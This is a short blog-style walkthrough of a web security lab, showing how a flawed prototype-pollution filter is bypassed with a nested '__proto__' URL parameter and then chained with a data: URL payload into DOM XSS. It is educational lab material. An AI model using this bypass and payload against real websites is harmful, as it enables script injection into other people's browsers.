29.3 Lab: Client-side prototype pollution via flawed sanitization
This lab is vulnerable to DOM XSS via client-side prototype pollution. Although the developers have implemented measures to prevent prototype pollution, these can be easily bypassed. Find a source that you can use to add arbitrary properties to the global Object.prototype. Identify a gadget property that allows you to execute arbitrary JavaScript.Combine these to call alert() | Karthikeyan Nagaraj
2 min readJun 13, 2024
Description
This lab is vulnerable to DOM XSS via client-side prototype pollution. Although the developers have implemented measures to prevent prototype pollution, these can be easily bypassed.
To solve the lab:
- Find a source that you can use to add arbitrary properties to the global
Object.prototype. - Identify a gadget property that allows you to execute arbitrary JavaScript.
- Combine these to call
alert().
Solution
- Using the prototype pollution source, try injecting an arbitrary
transport_urlproperty:/?__pro__proto__to__[transport_url]=foo - In the browser DevTools panel, go to the Elements tab and study the HTML content of the page. Observe that a <script> element has been rendered on the page, with the
srcattributefoo. - Modify the payload in the URL to inject an XSS proof-of-concept. For example, you can use a
data:URL as follows:/?__pro__proto__to__[transport_url]=data:,alert(1); - Observe that the
alert(1)is called and the lab is solved.
A YouTube Channel for Cybersecurity Lab’s Poc and Write-ups
Telegram Channel for Free Ethical Hacking Dumps
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng
